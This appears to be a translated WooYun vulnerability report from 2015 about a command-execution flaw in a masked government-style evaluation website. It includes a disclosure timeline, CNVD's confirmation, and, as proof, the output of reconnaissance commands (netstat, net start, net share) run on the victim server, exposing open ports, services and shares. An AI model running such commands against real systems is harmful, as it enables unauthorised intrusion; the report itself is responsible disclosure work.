WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
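2015-06-24: Details reported to the vendor; awaiting vendor response
2015-06-28: Vendor confirmed; details disclosed only to the vendor
2015-07-08: Details disclosed to core white hats and relevant domain experts
2015-07-18: Details disclosed to regular white hats
2015-07-28: Details disclosed to intern white hats
2015-08-12: Details disclosed to the public
Address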
1.http://**.**.**/evaluation/evaluation/toScoreList.actionidentityNumber=
A command execution vulnerability exists.
netstat -ano
活动连接

  协议  本地地址          外部地址          状态          PID
  TCP   0.0.0.0:135       0.0.0.0:0         LISTENING     664
  TCP   0.0.0.0:445       0.0.0.0:0         LISTENING     4
  TCP   0.0.0.0:3306      0.0.0.0:0         LISTENING     1240
  TCP   0.0.0.0:3389      0.0.0.0:0         LISTENING     1776
  TCP   0.0.0.0:8000      0.0.0.0:0         LISTENING     38712
  TCP   0.0.0.0:8009      0.0.0.0:0         LISTENING     38712
  TCP   0.0.0.0:8080      0.0.0.0:0         LISTENING     1172
  TCP   0.0.0.0:49152     0.0.0.0:0         LISTENING     404
  TCP   0.0.0.0:49153     0.0.0.0:0         LISTENING     772
  TCP   0.0.0.0:49154     0.0.0.0:0         LISTENING     824
  TCP   0.0.0.0:49155     0.0.0.0:0         LISTENING     500
  TCP   0.0.0.0:49156     0.0.0.0:0         LISTENING     448
  TCP   0.0.0.0:49157     0.0.0.0:0         LISTENING     1816
  TCP   127.0.0.1:3306    127.0.0.1:51294   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51295   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51314   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51315   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51344   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51345   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51346   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51347   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51348   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51349   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51350   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51351   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51352   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51353   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51354   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51355   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51356   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51357   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51358   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51359   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51384   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51429   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51475   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51476   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51485   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51506   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51507   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51508   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51509   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51526   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51527   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51540   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51541   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51554   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51567   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51568   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51569   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51570   ESTABLISHED   1240
  TCP   127.0.0.1:3306    127.0.0.1:51571   ESTABLISHED   1240
  TCP   127.0.0.1:3306
net start
已经启动以下 Windows 服务:

   Apache2.2
   Application Experience
   Background Intelligent Transfer Service
   Base Filtering Engine
   Certificate Propagation
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   DNS Client
   Group Policy Client
   Human Interface Device Access
   IKE and AuthIP IPsec Keying Modules
   IP Helper
   IPsec Policy Agent
   MySQL55
   Network Connections
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Plug and Play
   Power
   Print Spooler
   Remote Desktop Configuration
   Remote Desktop Services
   Remote Desktop Services UserMode Port Redirector
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Security Accounts Manager
   Server
   Shell Hardware Detection
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   User Profile Service
   Windows Event Log
   Windows Firewall
   Windows Management Instrumentation
   Windows Time
   Windows Update
   Workstation
   主动防御

命令成功完成。
net share
共享名       资源                            注解
-------------------------------------------------------------------------------
C$           C:\
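Having remote terminal access open is not a great idea, is it?
Strengthen security awareness.
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-06-28 07:19
CNVD confirmed and reproduced the reported issue and has forwarded it via CNCERT to the Shaanxi sub-center, which will coordinate follow-up handling with the organization that manages the website.
None yet.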